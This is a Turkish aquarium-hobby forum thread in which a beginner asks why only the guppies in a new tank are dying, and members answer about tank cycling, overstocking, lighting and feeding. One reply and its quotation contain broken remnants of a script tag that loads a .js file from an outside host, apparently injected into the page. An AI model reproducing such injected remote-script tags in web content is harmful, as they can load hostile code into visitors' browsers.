Sadece Lepistesler ölüyor,sebep ne olabilir?


rz356Çevrim Dışı

Kayıt: 07/04/2014
İl: Izmir
Mesaj: 27
rz356Çevrim Dışı
Gönderim Zamanı: 15 Nisan 2014 10:02
Arkadaşlar merhaba,
 
Forumda yaptığım aramada kendi sorunum ile ilgili uygun bir başlığa ulaşamadım.Bu yüzden tecrübeli dostlardan yardım rica ediyorum. Yaklaşık 3  hafta önce 80 cm bombeli 90 lt akvaryum aldım.1 hafta ısıtıcı 27-29 derece arası ayarlı ve iç filtre çalışır durumda bekledi.Sonra ilk balıklarımı aldım.Akvaryuma 10cc bakteri ile 2 çöpçü,1 lepistes,2 tetra ilave ettim..2-3 gün sonra baktım yaşıyorlar 20'ye yakın balık aldım.boyları 1-3 cm arası değişiyor.. Baştaki lepistes hariç 2 erkek 4 hamile dişi lepistes,2 vatoz,2 moli (geri kalanın ismi bilmediğim için yazamıyorum; eşim renkleri hoşuna gittiği ve beraber yaşabileceği söylendiği için almış..) daha aldım. yaklaşık 1 haftadır beraber sorunsuz yaşıyorlar.Her cins kendi cinsiyle takılıyor ve birbirlerine zararları yok ancak son 3 günde 5 lepistes 1 çöpçü sizlere ömür..Tabi son balık ilavesinde lepistesler doğurunca yavrular saklansın diye yeşillikte koydum içine (Bu yeşillikleri yıkamadan koyduğum için üstünde 20-30 tane minik örümceğe benzer böcek gördüm ve hepsini öldürdüm  1-2 gün sonrada minik minik salyangozlar türedi..Gördükçe öldürmeden topluyorum..
 
Çalıştığım için sadece akşam 8-9 dan sonra ilgilenebiliyorum.Bakteriyi veren akvaryumcum ilk 10 gün elimin ucuyla yemlememi söyledi.Sonra doyurana kadar sabah-akşam ver dedi.2-3 gündür sabah akşam 2-3 parpak ucu yem atıyorum..
 
Şimdi yukarıda anlattıklarımdan sonra sadece lepisteslerin ölüm sebebi ne olabilir? Özellikle hamile olanların? Bir başlıkta,hamile olan lepisteslerin ithal olduğunu ve bu yüzden fazla dayanamadıklarını yazmış..Sizce sebep ne olabilir? Dezenfektan kullanmalımıyım yada başka birşey? Salyangozlardan kurtulmak için ne yapabilirim? (Katil salyangoz hariç..)
 
Not: Akvaryumu ilk aldığım hafta iç filtre sürekli vantuzlarından kurtulup görevini yapamadığı için 3. gün gidip lifetech 835 dış filtre aldım ve 1 gün akvaryum dışı boş çalıştırdım.Su çıkışını akvaryumun üstüne doğru verdim.Üstte bir dalgalanma gözlemleniyor yağ tabakası oluşmaması için ama tabandaki pisliği çekmediğini düşünüyorum.Bu da bana dip temizliği yaptıracak gibi görünüyor..
 
Ölen lepistesler'in boyası-rengi çıkıyor elime ?
 
Tecrübelerinizi paylaşırsanız sevinirim.. Yada formda uygun başlıklara yönlendirirseniz sevinirim..
 
Balıklar öldükçe bende ölüyorum

Üye imzalarını sadece giriş yapan üyelerimiz görebilir

mesutokÇevrim Dışı

Kıdemli Akvarist
Kayıt: 10/04/2009
İl: Istanbul
Mesaj: 17993
mesutokÇevrim Dışı
Kıdemli Akvarist
Gönderim Zamanı: 15 Nisan 2014 10:17
Şimdi balık seçerken sağlıklı balık seçmek önemli, balıklarda bir rahatsızlık olabilir, örneğin kuyruğunda yüzgecinde beyaz benek paraziti olabilir, gövdede pamukçuk gibi mantarlar olabilir böyle balıkları almamakta fayda var sağlıklı balık seçimi önemli, Yeni kurulmuş bir tank ilk balık eklemede amonyak üst seviyeler çıkabilir faydalı bakteriler çoğaldıkça bu amonyakları zararsız hallere çevirir, bu sırada balıkar olumsuz etkilenebilir amonyaktan. dediğiniz salyangozara adi salyangoz diyorlar iste bitkilerle genelde gelir akvaryuma ve istila ederler akvaryumu zamanla iç filtrenin süngerinde bile görünürler. Bunlar için aslında dengeleyiciyi bir doğal canlı Helena (Katil salyangozdur) helenalar zamanla çoğalırsa diğer ilanlarda tanesi 1-2 Tl den satar yem parasını bile çıkarırsınız adi salyangoz gibide istila etmezler hızla çoğalmazlar. İç filtreniniz vantuzları camı tutmuyormuş, onu götürün aldığnız akvaryumcudan maşka bir modelle değiştirin. Bu arada haftada bir mutlaka akvaryumdan bir biktar su çekip yerine taze su ekleyin böyleced sudaki amonyak, nitrat uzaklaştırmış olursunuz. Bir süre ölenlerin yerine canlı almayın, suyunuz iyice otursun sonra sağlıklı balıklar seçersiniz. fazlada tank oturunca akvrayumculardan balık almaya özen gösterin, bir hastalıklı balık tüm tanktaki balıkları öldürebilir. Bir akvaryum yeni kurulan akvaryum yaklaşı 3 ayda su döngüsü yavaş yavaş oturmuş oluyor. Hatta bazı incelemelerde bunun 6 aya kadar sürdüğü bile söylenir.

Üye imzalarını sadece giriş yapan üyelerimiz görebilir

rz356Çevrim Dışı

Kayıt: 07/04/2014
İl: Izmir
Mesaj: 27
rz356Çevrim Dışı
Gönderim Zamanı: 15 Nisan 2014 10:21
      





Üye imzalarını sadece giriş yapan üyelerimiz görebilir

mesutokÇevrim Dışı

Kıdemli Akvarist
Kayıt: 10/04/2009
İl: Istanbul
Mesaj: 17993
mesutokÇevrim Dışı
Kıdemli Akvarist
Gönderim Zamanı: 15 Nisan 2014 10:27
İlk resimdeki ışık çok kuvvetli yansıyor dalgıç floresanmı o suyun içindemi yanıyor. Yani benim bile gözümü aldı ışık resimden, lepistesler yüzey kısımda yüzen balıklar, bu ışıktan rahatsız olmazlarmı acaba.

Üye imzalarını sadece giriş yapan üyelerimiz görebilir

rz356Çevrim Dışı

Kayıt: 07/04/2014
İl: Izmir
Mesaj: 27
rz356Çevrim Dışı
Gönderim Zamanı: 15 Nisan 2014 10:47
[QUOTE=mesutok]Şimdi balık seçerken sağlıklı balık seçmek önemli, balıklarda bir rahatsızlık olabilir, örneğin kuyruğunda yüzgecinde beyaz benek paraziti olabilir, gövdede pamukçuk gibi mantarlar olabilir böyle balıkları almamakta fayda var sağlıklı balık seçimi önemli, Yeni kurulmuş bir tank ilk balık eklemede amonyak üst seviyeler çıkabilir faydalı bakteriler çoğaldıkça bu amonyakları zararsız hallere çevirir, bu sırada balıkar olumsuz etkilenebilir amonyaktan. dediğiniz salyangozara adi salyangoz diyorlar iste bitkilerle genelde gelir akvaryuma ve istila ederler akvaryumu zamanla iç filtrenin süngerinde bile görünürler. Bunlar için aslında dengeleyiciyi bir doğal canlı Helena (Katil salyangozdur) helenalar zamanla çoğalırsa diğer ilanlarda tanesi 1-2 Tl den satar yem parasını bile çıkarırsınız adi salyangoz gibide istila etmezler hızla çoğalmazlar. İç filtreniniz vantuzları camı tutmuyormuş, onu götürün aldığnız akvaryumcudan maşka bir modelle değiştirin. Bu arada haftada bir mutlaka akvaryumdan bir biktar su çekip yerine taze su ekleyin böyleced sudaki amonyak, nitrat uzaklaştırmış olursunuz. Bir süre ölenlerin yerine canlı almayın, suyunuz iyice otursun sonra sağlıklı balıklar seçersiniz. fazlada tank oturunca akvrayumculardan balık almaya özen gösterin, bir hastalıklı balık tüm tanktaki balıkları öldürebilir. Bir akvaryum yeni kurulan akvaryum yaklaşı 3 ayda su döngüsü yavaş yavaş oturmuş oluyor. Hatta bazı incelemelerde bunun 6 aya kadar sürdüğü bile söylenir.[/QUOTE]
 
Sn Mesutok,cevap için teşekkür ederim.. Bu işe bir hevesle başladığım için detaylı araştırma şansım olmadı.1 haftalık sürede vakit buldukça forumlardan okuduklarımla sınırlı bilgim..Mutlaka daha çooook fırın ekmek yemem lazım.Bu ekmekleri de sizlerden alacağım izin verirseniz  Satan ve bu hobiyle uğraşan bir çok dostum ilk başta kayıpların olacağından söz etmişlerdi ama sonuçta canlı bakıyoruz ve benim hatam yüzünden ölmeleri beni üzüyor.. Size göre çıkan sonuç  akvaryumun daha tam oturmaması gibi anladım.Ancak neden sadece lepistesler? bir dünya cins var orda
 
Otlar okadar sağlıklı ve canlıydı ki,hiç aklıma gelmedi parazit vs getirecekleri..Aldığım yerde o kadar büyük ve o kadar çok çeşit balık varki,eşimi zor frenledim almaması için.. ( Bu frenlemiş halimiz )  Başta  ciklet alacaktık ama forumlarda 90lt akvaryuma 5 tane yeterli,gün boyu sabit otların arkasında kalır,çok pisletir,senede bir ürer denince canlı doğurana yöneldik.
 
Işık evet su içinde ve tüm odayı aydınlatıyor resmen..Daha önce su üstündeydi ve daha hoş bir görüntü oluyordu ancak son aldığım balıkların poşetindeki su ile biraz daha yükseldi ve vantuzlar sınırda olduğu için yukarı çekemedim ışığı..Aslında kapağa led ışık düşündüm ama terleme yaptığı için sıkıntı olur korkusuna yaptırmadım.. (Bu arada kapağı sürekli kapalı tutmamın bir sakıncası var mı?) Işığı da otların gelişmesi için sürekli açık bırakın diyorlar  ne yapacağımı şaşırdım. Balıkların oksijen alması için illa bu baloncuk çıkaran boruyu sürekli çalıştırmam gerekiyor mu? balıklar yüzeyde ağızları açık gezince korkuyorum ölecekler diye
 
 
 

Üye imzalarını sadece giriş yapan üyelerimiz görebilir

mesutokÇevrim Dışı

Kıdemli Akvarist
Kayıt: 10/04/2009
İl: Istanbul
Mesaj: 17993
mesutokÇevrim Dışı
Kıdemli Akvarist
Gönderim Zamanı: 15 Nisan 2014 11:01
Ben çok basit temel konulardan bahsettim, türünüze ait çok ayrıntı var hassas balık bu lepistesler bazı şartlara ihtiyaç duyuyorlar, bakteri uyuşmazlığı denen muammalı bir konuları var. Bir kere şu olumsuzlukları atlatsanız sorun çözülür fazlada dışardan sonra balık alıp eklemezsiniz, çünkü akvaryumcudan aldığınız balıklarda birçok rahatsızlık getirebiliyorlar. Yani o ışık olayı benim içime sinmedi kapaktan ışık vermeniz daha sağlıklı olur, led ışık kullananlar çok enerji tasarurfada sağlıyor, ben bakarken benim gözümü aldı ışık resimden, yani o balıklar çok rahatsız oluyordur, zaten o resimde ben balıkların sağa sola biriktiklerini gördüm, çünkü balıkların göz kapağı yoktur yüksek ışıktan rahatsız olurlar. Kapağı kapalı tutmanızda bir sorun yok, hava motoru, ve diğer filtreler havalandırmayı sağlar. Yüzyede bir akıntı varsa bu da oksijen sağlayabilir yahut iç filtrenizdeki akıntı, üflediği baloncuklar, suda hava taşı, hava motoru haricinde bir filtre çalışıyorsa dış filtre gibi onun fıskıye sistemini yüzeye doğru vermişseniz o bir akıntı yapar yüzeyde sürtünme, buda akıntı sağlar oksijen üretir, o zaman böyle durumda hava motoru kullanmayanlarda var. Ama oksijenin oluşması içni yani suda bir hafif akıntı olmalı. Durgun suda hareketsiz suda oksijen üretilmiyor. Oksijenin oluşması suyla havanın sürtünmesiyle sağlanıyor. Ben size bazı bilgiler veriyorum, türünüzle ilgili tecrübeli arkadaşlar var onlar türle ilgili şeyleri size söyleyecektir. Balıklarınızı bir yakından izleyin bu arada üzerlerinde önceki measjda yadığım parazitlerden varmı.  mesutok2014-04-15 11:12:15

Üye imzalarını sadece giriş yapan üyelerimiz görebilir

Mustafa25Çevrim Dışı

Kayıt: 16/03/2014
İl: Istanbul
Mesaj: 143
Mustafa25Çevrim Dışı
Gönderim Zamanı: 15 Nisan 2014 11:46
Barış bey öncelikle akvaryumunuz hayırlı olsun.
Yeni başlamanın verdiği hevesle yeni kurulan tanka birden çok sayıda balık eklemişsiniz bu da düzeni oturma aşamasındaki akvaryumdaki bütün dengeleri alt üst eder.Bu bakteri döngüsü konusu v.s. zamanla araştırarak zaten çözersiniz bu işe başladığınız zaman araştırma şart oluyor. Bende yaklaşık 2 yıl besledim lepistes. Lepistesler biraz narin oluyorlar. Size tavsiyem en azından biraz tecrübe kazanıncaya kadar özellikle lepistes alırken hamile olanları almamaya özen gösterin.Hamile lepisteslerde zaten hamilelikten kaynaklanan bir stres oluyor birde üzerine ortam değişikliği olunca hayvan ağır bi darbe yemiş gibi oluyor 

Üye imzalarını sadece giriş yapan üyelerimiz görebilir

rz356Çevrim Dışı

Kayıt: 07/04/2014
İl: Izmir
Mesaj: 27
rz356Çevrim Dışı
Gönderim Zamanı: 15 Nisan 2014 12:29
[QUOTE=mesutok]Ben çok basit temel konulardan bahsettim, türünüze ait çok ayrıntı var hassas balık bu lepistesler bazı şartlara ihtiyaç duyuyorlar, bakteri uyuşmazlığı denen muammalı bir konuları var. Bir kere şu olumsuzlukları atlatsanız sorun çözülür fazlada dışardan sonra balık alıp eklemezsiniz, çünkü akvaryumcudan aldığınız balıklarda birçok rahatsızlık getirebiliyorlar. Yani o ışık olayı benim içime sinmedi kapaktan ışık vermeniz daha sağlıklı olur, led ışık kullananlar çok enerji tasarurfada sağlıyor, ben bakarken benim gözümü aldı ışık resimden, yani o balıklar çok rahatsız oluyordur, zaten o resimde ben balıkların sağa sola biriktiklerini gördüm, çünkü balıkların göz kapağı yoktur yüksek ışıktan rahatsız olurlar. Kapağı kapalı tutmanızda bir sorun yok, hava motoru, ve diğer filtreler havalandırmayı sağlar. Yüzyede bir akıntı varsa bu da oksijen sağlayabilir yahut iç filtrenizdeki akıntı, üflediği baloncuklar, suda hava taşı, hava motoru haricinde bir filtre çalışıyorsa dış filtre gibi onun fıskıye sistemini yüzeye doğru vermişseniz o bir akıntı yapar yüzeyde sürtünme, buda akıntı sağlar oksijen üretir, o zaman böyle durumda hava motoru kullanmayanlarda var. Ama oksijenin oluşması içni yani suda bir hafif akıntı olmalı. Durgun suda hareketsiz suda oksijen üretilmiyor. Oksijenin oluşması suyla havanın sürtünmesiyle sağlanıyor. Ben size bazı bilgiler veriyorum, türünüzle ilgili tecrübeli arkadaşlar var onlar türle ilgili şeyleri size söyleyecektir. Balıklarınızı bir yakından izleyin bu arada üzerlerinde önceki measjda yadığım parazitlerden varmı.  [/QUOTE]
 
Mesut Bey,ışık konusunu en kısa zamanda halledicem.En kötü daha kısa yada pembe-mavi renkli bir ışık koyabilirim..Led'ler de su sıkıntısı olmuyorsa hemen kapağa taktırırım led'i.. Hiç yakmasam yeşillikler de sıkıntı olur mu? Yosunlaşma olmaması için gün ışığı fazla görmüyor akvaryum..
 
Hava taşı için sadece giriş ve çıkış tarafında hava kabarcıkları oluyor diye okununca resimdeki delikli boruyu aldım.Hava motoru çift çıkışlı,diğer uç astronotu ayakta tutuyor ama hava motoru en kısıkta bile çok ses yapıyor..Püf noktası var mı? (delikli boruda asla su olmasın,delikler aşağı baksın,borunun bi tarafı yukarda olsun yada düz ve akvaryumun ortasında olsun vs.. önerileriniz ?) Hem görüntü hem hava kabarcıkları oksijen üretir düşüncesiyle sürekli çalıştırıyorum. Dış filtre fıskiyesinde hava  kabarcığı oluşmuyor..sadece akıntı var ve balıklar içine girip oyun oynamaya bayılıyorlar.. Fıskiye önce aşağı bakıyordu ama baktım balıklar akvaryumun sol tarafında bekliyorlar,dedim akıntı yordu galiba; hemen fıskiye yönünü yukarı verdim.Ancak bu seferde dipte akıntı olmadığı için(yada ben göremiyorum) altta balık pislikleri-dışkıları birikmeye başladı..(Ölü balıkları alırken ve salyangoz toplarken dipteki kumu elledeğimde kalkıp suyu bulandırdılar..) Dış filtre görevini yapmıyor mu acaba? En altında karbon var,onu 1 ay sonra seramikle değişin diyorlar..Faydası?
 
Lepisteslerin nazik balıklar olduğunu söylemişlerdi..Parazit olup olmadığına akşam eve gidince bakacağım ama zannetmiyorum tertemiz balıklardı..
 
Tekrar sorayım; Tedbir amaçlı dezenfektan (mavi ilaç) atmama gerek var mı?
 
Hava moturunu çalıştırmasam,dış filtre akvaryumun oksijen ihtiyacını karşılar mı?
 
Bir başlıkta tüm sorularıma cevap arıyorum belki ama gün içi kaçamak giriyorum internete kusuruma bakmayın..
 
 

Üye imzalarını sadece giriş yapan üyelerimiz görebilir

Mustafa25Çevrim Dışı

Kayıt: 16/03/2014
İl: Istanbul
Mesaj: 143
Mustafa25Çevrim Dışı
Gönderim Zamanı: 15 Nisan 2014 15:52
Hava motorlarında ses sorunu oluyor malesef. Ses sorunun olmadığı motorlarda var ama fiyatları biraz yüksek ve zamanla onlarında gürültülü çalışmaya başladığı söyleniyor. Dış filtreniz su yüzeyinde yeterli dalgalanma oluşturuyorsa oksijenle ilgili problem olmaz.Dezenfektanı hastalık belirtileri olmadığı sürece kullanmanıza gerek yok ama elinizin altında bulunsun bence.

Üye imzalarını sadece giriş yapan üyelerimiz görebilir

rz356Çevrim Dışı

Kayıt: 07/04/2014
İl: Izmir
Mesaj: 27
rz356Çevrim Dışı
Gönderim Zamanı: 16 Nisan 2014 14:45
[QUOTE=Mustafa25] Hava motorlarında ses sorunu oluyor malesef. Ses sorunun olmadığı motorlarda var ama fiyatları biraz yüksek ve zamanla onlarında gürültülü çalışmaya başladığı söyleniyor. Dış filtreniz su yüzeyinde yeterli dalgalanma oluşturuyorsa oksijenle ilgili problem olmaz.Dezenfektanı hastalık belirtileri olmadığı sürece kullanmanıza gerek yok ama elinizin altında bulunsun bence.[/QUOTE]

Öncelikle teşekkür ederim,sözde en sessizini verdiler hava motorunun,sanki boru çok aşağıda olup bağlantı hortumunun uzun gelmesi ve oluşan titreşim kaynaklı ses yapıyor..dış filtre açıklamanız beni rahatlattı..


Akşam hepdine tek tek baktım hiç birinin kuyruğunda yıpranma-beyaz renkli benek vs yok.. Tertemiz maşallah hepsi.. Sadece sarı tonlu 2 balığın kuyruğunda siyah 2-3 tane leke gödüm


2 tsne lepistes kaldı, biri ilk aldığım diğeri son aldıklarımdan.. Son alınan ne zaman görsem en üst köşe noktada hareketsiz duruyor, yemek yemeye hali yok..

Nasıl bir yem ve ne zamanlar vermeliyim. Bendekiler iri taneli, tam ezilmiyor. Büyükleri balıklar yiyemiyor ve dipte birikiyor

Son 2'yi de dün akşam ölü buldum..Sadece dişiler değil,erkeklerde sizlere ömür..Sadece ilk aldığım en küçük lepistesim kaldı :( Diğer balıklarda çok şükür sıkıntı yok..

Işığı ve hava motorunu; dün gündüz kapattım,bi nebze de olsa rahatlatır balıkları..En azından kısa boy alana kadar..
 
Yanlız dün akşam üst kapağın 1 parmak üstünde olan suyun yarım parmak altına indiğini farkettim.Dedim sızıntı vs mi var? baktım dış filtre ve akvaryum kenarına birşey yok..Sanırım buharlaşıyor..Bitkiler büyüyor,hele çöpçü; bu hafta sonu 1 ay olacak 2 katı oldu :D
 
Umarım bundan sonra ölmezler..Lepistes almaya korkuyorum :(
 

Üye imzalarını sadece giriş yapan üyelerimiz görebilir

Imperfectnest495Çevrim Dışı

Kayıt: 24/01/2012
İl: Diyarbakir
Mesaj: 574
Imperfectnest495Çevrim Dışı
Gönderim Zamanı: 18 Nisan 2014 01:29
Lepistesi bir 5-6 ay sonra tekrar besleyebilirsiniz.Belli ki lepistesleriniz,su düzeniniz tam oturmadığı için öldüler.Lepistesleri akvaryuma,akvaryumu kurduktan en az 5 ay sonra ekleyebilirsiz.Öyle çat diye akvaryuma 20 balık da atılmaz.Önce akvaryumu bir hafta boş çalıştıracaktız(Çalıştırdınız),akvaryuma ara ara yem atıp bakteriye döngünün oluşmasına yardım  edecektiniz.(Sonra 4-5(Akvaryumun boyuna göre sayı artabilir ya dazalabilir.)Çöğçü atıp ve/ya vatoz(Cüce)(salyangoz da olabilir.)Bir ay bu şekilde bekleyecektiniz.Sonraki ay 3-5 kılıç ya da platy atabilirdiniz.10 gün sonra bişey olmuyorsa birkaç tane daha,sonraki ay velifera-moli ve en son(Akvaryumu kurduktan yaklaşık 5 ay sonra)Lepistes ekleyecektiniz.< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">
  Böylece bütün balıklarınız sağlıklı olabilirdi ama siz yapmışsınız daha,yapacak birşey yokBol miktarda(Özellikle lepisteslerde)Bol bol ölüm yaşayabilirsiniz.Ben bunu,buraya yeni akvaryum kuracak arkadaşlar da hata yapmasın diye yazıyorum.
       Geçmiş olsun ...
< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID"> < ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">İBOW@R2014-04-18 01:42:44

Üye imzalarını sadece giriş yapan üyelerimiz görebilir

rz356Çevrim Dışı

Kayıt: 07/04/2014
İl: Izmir
Mesaj: 27
rz356Çevrim Dışı
Gönderim Zamanı: 18 Nisan 2014 13:42
[QUOTE=İBOW@R]Lepistesi bir 5-6 ay sonra tekrar besleyebilirsiniz.Belli ki lepistesleriniz,su düzeniniz tam oturmadığı için öldüler.Lepistesleri akvaryuma,akvaryumu kurduktan en az 5 ay sonra ekleyebilirsiz.Öyle çat diye akvaryuma 20 balık da atılmaz.Önce akvaryumu bir hafta boş çalıştıracaktız(Çalıştırdınız),akvaryuma ara ara yem atıp bakteriye döngünün oluşmasına yardım  edecektiniz.(Sonra 4-5(Akvaryumun boyuna göre sayı artabilir ya dazalabilir.)Çöğçü atıp ve/ya vatoz(Cüce)(salyangoz da olabilir.)Bir ay bu şekilde bekleyecektiniz.Sonraki ay 3-5 kılıç ya da platy atabilirdiniz.10 gün sonra bişey olmuyorsa birkaç tane daha,sonraki ay velifera-moli ve en son(Akvaryumu kurduktan yaklaşık 5 ay sonra)Lepistes ekleyecektiniz.< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">
  Böylece bütün balıklarınız sağlıklı olabilirdi ama siz yapmışsınız daha,yapacak birşey yokBol miktarda(Özellikle lepisteslerde)Bol bol ölüm yaşayabilirsiniz.Ben bunu,buraya yeni akvaryum kuracak arkadaşlar da hata yapmasın diye yazıyorum.
       Geçmiş olsun ...
< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID"> < ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">[/QUOTE]
 
 
Sn ibow@R,
 
Bir hevesle bu işe başladık,akvaryumu aldığım yer boş çalıştırmam gerektiğini söyleyince hayal kırıklığına uğrayıp 1 haftanın geçmesini iple çektik.Bu arada bir çok forum ve başlık okudum ve herkesin farklı şeyler anlattığını tecrübe ettim.Tam net cevap alamadım açıkcası..Hatta İzmir de en iyi akvaryumcu listesindeki tüm akvaryumcuları gezdim ve balık aldım ama hiç biri forumlarda anlatıldığı gibi yardımcı olmadı-bilgi vermedi..Hatta bilinçli-bilinçsiz artık günahları onlara ait; aldığım yeşillikle akvaryumumda salyangoz üredi..Hiç biri demedi; Lepistesi 5-6 ay sonra ilave et diye
 
Tamam bu işten para kazanıyorlar ama bu iş dürüstçe yapılmadığında; o mekana her gidişimde acaba? diye soru işareti geliyor aklıma.. Kimi arkadaş 1 hafta boş çalıştır sadece balık yemi atıp uygun ortamı sağlarsın derken balık aldığım yer 10 cc bakteri atmamı söyledi vs koca tüpün 5'te 1 ni kullandım.Geri kalan duruyor..Ne zaman kullanırım,kullanmam gerekir mi açıklama yok.. Kendimce; akvaryumu sıfırlar yada yeni bir akvaryum alırsam o zaman değerlendireceğim herhalde dedim..
 
Uygun yem sordum;açık yem verdi ve yem elde ufalanmıyor..Büyük taneyi balık yiyemiyor dipte birikiyor..Çöpçüm ve vatozlar 1 ayda 2 katına çıktı  Bir dünya yem çeşidi var,fırsat buldukça forumda gezip uygun başlıklara göz gezdiriyorum ama gene net cevap bulamıyorum..Burada bile sorduğum ne zaman ve hangi yemi kullanmalıyıma cevap alamadım henüz  Hala balıkçının verdiği yemi kullanıyorum
Bu arada yukarıda saydığınız tüm balıklar var-kılıç hariç.. Lepistes,moli,plati,vatoz,çöpçü,minik tetra vs.. Şu ana kadar da Lepistes dışında sıkıntı yok çok şükür..
 
Dediğiniz gibi lepistes için acele etmeyeceğim,belki yeni ay da duruma göre 3-5 tane daha moli,plati vs ekleyebilirim..
 
Teşekkürler ilginize..

Üye imzalarını sadece giriş yapan üyelerimiz görebilir

f.torresÇevrim Dışı

Özel Üye
Kayıt: 21/02/2010
İl: Izmir
Mesaj: 3000
f.torresÇevrim Dışı
Özel Üye
Gönderim Zamanı: 18 Nisan 2014 13:55

Uygun yem sordum;açık yem verdi ve yem elde ufalanmıyor..Büyük taneyi balık yiyemiyor dipte birikiyor..Çöpçüm ve vatozlar 1 ayda 2 katına çıktı Bir dünya yem çeşidi var,fırsat buldukça forumda gezip uygun başlıklara göz gezdiriyorum ama gene net cevap bulamıyorum..Burada bile sorduğum ne zaman ve hangi yemi kullanmalıyıma cevap alamadım henüz Hala balıkçının verdiği yemi kullanıyorum


Barış bey akvaryumcu size dip yemi satmış anlaşılan lepistesler için sera tetra tropical gibi kaliteli markaların pul yemleri uygundur markasız dip yemi aslında hiçbir akvaryum balığına uygun yemler değildir.Geçmiş olsun.


Üye imzalarını sadece giriş yapan üyelerimiz görebilir

Mustafa25Çevrim Dışı

Kayıt: 16/03/2014
İl: Istanbul
Mesaj: 143
Mustafa25Çevrim Dışı
Gönderim Zamanı: 18 Nisan 2014 14:24
Barış bey en bastada yazdığım gibi sizin tek hatanız yeni başlamaanın verdiği hevesle yeni kurulmuş akvaryum birden çok sayıda balık eklemek olmuş. Size tavsiyem öncelikle ışık sorlununu çözün bir şekilde dalgıç gerçekten göz alıyor. Daha sonrada su değişimlerini aksatmadan yapıp balıklarınızı gözlemleyin onların hareketleri size yol gösterici olacaktır. Yem konusunda canlı doğuranlar için bitkisel ağırlıklı pul yemler daha iyi olacaktır. Sera vipan,sera goldy size önerebileceğim kullandığm uygun fiyatlı pul yemler. Sizin bahsettiğin yem sanırım granul yemlerden ama canlı doğuranlar pul yem kadar ilgi göstermeselerde bende veriyorum arada bir granül yemlerden. Granül yem olarakte sera vipagran kullandığm yemlerden. Farklılık açısından canlı yemlerde faydalı olur artemia,ve su piresi gibi kullandın mı derseniz kullanmadım ve bir sorunda yaşamadım ama faydalı olduğu konusunda hemfikirim.ayrıca ıspanak bezelyede verebilirsiniz. Size isimlerini verdiğim yemlerin üçünüde kullanıyorum ve gayet memnunum kaliteli ve uygun fiyatlı yemler internete yazdığınızda kavonoz şeklinde olanları çıkıyor onlar biraz pahalı gelebilir ama petshoplarda 12gramlık paketlerde olanları var ve fiyatları 3.5-4lira arası. Son olarak yem konusundaki tavsiyem günde 2 yada 3 kez az miktarda ve çeşitli uemlerle besleyin. az kavramı balık sayınıza göre değişir tabi attığınız yemi bir dakikada tamamen bitiriyorlarsa ölçü uygun demektir bir dakika sonra kalan yemler oluyorsa çok vermişsinizdir bu da zamanla su dengelerini bozar eğer attığınız yem bir dakikadan daha çabuk bitiyorsa az vermişsiniz demektir 

Biraz uzun ve karışık oldu ama umarım faydalı olur Ve İnşallah balıklarınızı sağlıklı bir şekilde büyütebiir yavru alabilirsiniz. Keyifli hobiler.
Mustafa252014-04-18 14:27:04

Üye imzalarını sadece giriş yapan üyelerimiz görebilir